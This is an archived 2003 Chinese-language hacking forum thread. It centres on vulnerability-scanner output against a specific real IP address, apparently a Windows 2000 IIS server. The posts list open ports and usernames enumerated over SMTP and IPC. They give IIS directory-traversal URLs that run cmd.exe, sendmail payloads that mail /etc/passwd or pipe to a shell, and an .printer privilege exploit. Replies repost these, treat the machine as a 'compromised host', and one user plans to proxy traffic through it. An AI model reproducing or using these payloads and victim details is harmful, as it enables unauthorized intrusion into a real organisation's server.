Author: lyice [lyice] Forum user |
启动h0lescaner v4.10 漏洞扫描引擎...开始扫描......
目标IP地址为:61.182.239.242
扫描目标主机开放的端口:
25号端口(smtp)开放!
80号端口(未知)开放!
113号端口(auth)开放!
135号端口(未知)开放!
139号端口(nbsession)开放!
443号端口(未知)开放!
1025号端口(未知)开放!
1026号端口(未知)开放!
开始扫描FTP漏洞:
目标没有开放FTP服务...
开始扫描SMTP漏洞:
SMTP服务器的Banner:
220 czsli Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at Wed, 5 Feb 2003 18:20:36 +0800
214-This server supports the following commands:
214 HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH TURN ATRN ETRN BDAT VRFY
可以使用RCPT命令获得用户名列表.
可以使用VRFY命令获得用户名列表.
超时错误!
开始扫描FINGER漏洞:
目标没有开放FINGER服务...
开始扫描CGI漏洞:
WWW服务器的Banner:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 05 Feb 2003 10:28:39 GMT
Connection: Keep-Alive
Content-Length: 1162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQUIIY=GNGFHOGAHJBLGAKMOOHNOILF; path=/
Cache-control: private
开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...
发现/_vti_inf.html漏洞
开始扫描IIS漏洞:
WWW服务器的Banner:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 05 Feb 2003 10:30:25 GMT
Connection: Keep-Alive
Content-Length: 1162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQQUIIY=PNGFHOGAAMEDELFEHINIKINJ; path=/
Cache-control: private
开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...
发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞
开始扫描RPC漏洞:
目标没有开放RPC查询服务...
说明:扫描NTUSER漏洞:------此功能基于NT/2K以上版本的系统
说明:查询SHARES:------此功能基于NT/2K以上版本的系统
说明:查询USERS:------此功能基于NT/2K以上版本的系统
说明:查询GROUPS:------此功能基于NT/2K以上版本的系统
说明:查询TRANSPORTS:------此功能基于NT/2K以上版本的系统
说明:查询DATETIME:------此功能基于NT/2K以上版本的系统
说明:查询SERVICES:------此功能基于NT/2K以上版本的系统
说明:查询SESSIONS:------此功能基于NT/2K以上版本的系统
说明:查询REGISTRY:------此功能基于NT/2K以上版本的系统
说明:查询MORE:------此功能基于NT/2K以上版本的系统
扫描完毕!!!
尝试利用RCPT命令获得目标机上存在的一些常见用户名:
root test www web sybase oracle informix guest sam_exec + oracle8 access user ftp account backup owc datebase public info wais news bbs adm sync john sports china
检查decode别名: 检查漏洞
检查debug漏洞
检查kill漏洞
检查wiz漏洞
检查rcpt to: /tmp/.rhosts漏洞
检查+ +漏洞
检查RSET漏洞
检查mail from: |/bin/mail hacker < /etc/passwd漏洞
检查RSET漏洞
检查mail from: |tail|sh漏洞
[This post was edited by 我就是我 (lyice) on 02/05 at 20:59] |
Original post, posted: 2003-02-05 20:12:59 |
Reply: gfabcde [gfabcde] Forum user |
Thanks~ I was just worrying that I couldn't find a server to proxy my QQ |
Floor B1, posted: 02/05 21:11 |
Reply: vishx [vishx] Forum user |
发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞 |
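Floor B2, posted: 02/06 16:31 |
Reply: junjuntop [junjuntop] Forum user |
The IIS vulnerabilities are its fatal weakness |
Floor B3, posted: 02/13 17:36 |
Reply: freeip [freeip] Forum user |
A server with very poor security, it's really dreadful~ |
Floor B4, posted: 02/13 21:12 |
Reply: alixlinn [alixlinn] Forum user |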
端口扫描
80(HTTP) 21(FTP Control) 110(POP3) 25(SMTP) 443(HTTPS) 139(SMB) 139(SMB)
--------------------------------------------------------------------------------
IPC扫描
获得用户列表
Administrator (Admin)
Guest
IUSR_CZSLI
IWAM_CZSLI
newtimeserver (Admin)
TsInternetUser
--------------------------------------------------------------------------------
IIS扫描
IIS 远程执行: Remote Execute-E
FrontPage: FrontPage 扩展
--------------------------------------------------------------------------------
CGI扫描
WEB版本信息: Microsoft-IIS/5.0
扫描成功CGI漏洞
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ (HTTP: 200 )
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ (HTTP: 200 )
/scripts/samples/search/query.idq (HTTP: 200 )
/scripts/samples/search/filesize.idq (HTTP: 200 )
/scripts/samples/search/simple.idq (HTTP: 200 )
/scripts/samples/search/author.idq (HTTP: 200 )
/scripts/samples/search/queryhit.idq (HTTP: 200 )
/scripts/samples/search/qfullhit.htw (HTTP: 200 )
/scripts/samples/search/filetime.idq (HTTP: 200 )
/scripts/samples/search/qsumrhit.htw (HTTP: 200 )
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/_vti_bin/shtml.exe (HTTP: 200 )
/blabla.idq (HTTP: 200 )
/_vti_inf.html (HTTP: 200 )
/_vti_bin/shtml.dll (HTTP: 200 )
/_vti_bin/fpcount.exe (HTTP: 502 )
/abczxv.htw (HTTP: 200 )
/?PageServices (HTTP: 200 )
/*.idq (HTTP: 200 )
/*.ida (HTTP: 200 )
--------------------------------------------------------------------------------
Plugins
IIS5.0 .Printer Exploit(Grant System Privileges)
Better not to keep a compromised host like this, it won't last! It is easily stolen by someone else. And you can't possibly upgrade his system for him for free. |
Floor B5, posted: 02/16 00:47 |
Reply: vishx [vishx] Forum user |
IPC扫描
获得用户列表
Administrator (Admin)
Guest
IUSR_CZSLI
IWAM_CZSLI
newtimeserver (Admin)
TsInternetUser
--------------------------------------------------------------------------------
IIS扫描
IIS 远程执行: Remote Execute-E
FrontPage: FrontPage 扩展 |
Floor B6, posted: 02/16 09:22 |
Reply: junjuntop [junjuntop] Forum user |
Hehe!~ |
Floor B7, posted: 02/16 12:38 |